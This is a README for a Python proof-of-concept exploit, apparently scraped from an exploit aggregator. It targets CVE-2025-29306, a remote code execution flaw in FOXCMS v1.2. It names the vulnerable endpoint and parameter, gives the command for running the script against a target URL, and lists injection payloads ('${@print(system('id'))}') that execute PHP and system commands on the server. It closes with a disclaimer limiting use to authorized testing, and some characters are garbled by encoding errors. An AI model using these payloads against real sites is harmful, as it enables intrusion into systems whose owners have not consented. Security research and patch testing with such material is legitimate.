## https://sploitus.com/exploit?id=287AFBC8-F50F-527D-900A-3BEBC2E4E43D
# FOXCMS Parameter Injection RCE โ CVE-2025-29306
This repository contains a Python-based PoC for a Remote Code Execution (RCE) vulnerability affecting FOXCMS v1.2, a Chinese open-source content management system.
> CVE-ID: CVE-2025-29306
> Affects: FOXCMS v1.2
> Type: Service Parameter Injection โ Code Execution
---
## Vulnerability Summary
FOXCMS suffers from an insecure parameter parsing mechanism in the `id` parameter on the `/images/index.html` endpoint. This allows payload injection using `${@print()}` expressions, leading to PHP code execution.
---
## PoC Usage
### Requirements
- Python 3.x
- `requests` library
```bash
pip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# ๐ Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.
Author
Inok009